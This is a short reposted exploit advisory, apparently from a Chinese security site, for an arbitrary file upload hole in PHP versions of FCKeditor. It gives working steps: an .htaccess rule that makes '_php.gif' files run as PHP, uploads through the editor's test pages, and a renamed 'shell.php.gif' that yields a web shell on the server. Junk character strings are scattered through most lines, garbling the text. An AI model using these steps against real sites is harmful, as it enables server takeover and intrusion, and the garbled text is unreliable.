FCKeditor所有php版本Upload上传漏洞
: T& k3 r4 H5 ~7 M* Y# N作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
! h/ Y2 B j% q* f8 `9 I8 w4 k! L6 ~& t减小字体 增大字体0 Z+ f5 C4 [+ J% t' M+ t) [; k
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
/ M8 Y. T2 I/ P- V: W* I[+] Date: 2011
' F- H" v% }; i* v[+] Author : sinesafe.cn; X' a: s# D" X3 b: g5 @7 `) b
[+] Website : WwW.sinesafe.cn
2 d% V9 d$ a2 h0 U; Y———————————————————
# l9 T$ @4 a- A5 R1.create a htaccess file:7 {- N \7 A( C+ C2 N
code:
( j t/ W o/ G<FilesMatch “_php.gif”>
S6 C( u' n4 A6 ~0 TSetHandler application/x-httpd-php
; W; ?" h$ W' T3 F0 `5 u' i</FilesMatch>- ?( Y. U- E! @! E
# d% }6 V7 X# G/ E2.Now upload this htaccess with FCKeditor.$ m0 B$ f' i* r: w# y. d
- U5 L, X7 l; k
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html8 z* |* `6 s) a* d3 {) E9 x
4 Q% m& t$ H* a: h9 ]
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html2 S' Y/ W9 G# ?5 E$ d
+ p* l1 w/ ]$ m- X
———————————————————————————————-
; h6 t t: q" w" z. m) N3.Now upload shell.php.gif with FCKeditor.! u, ~; \8 c0 k- J. E4 `) H
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
1 |- s! `1 X6 k# Z6 z. t/ `5.http://www.sinesafe.cn/anything/shell_php.gif: F6 [# g& @9 K; X, D9 R
6.Now shell is available from server. |
p$ B9 ?( ~" L% \$ n' g4 x5 d5 W+ s
+ ^* U+ W( c; K9 J- J
|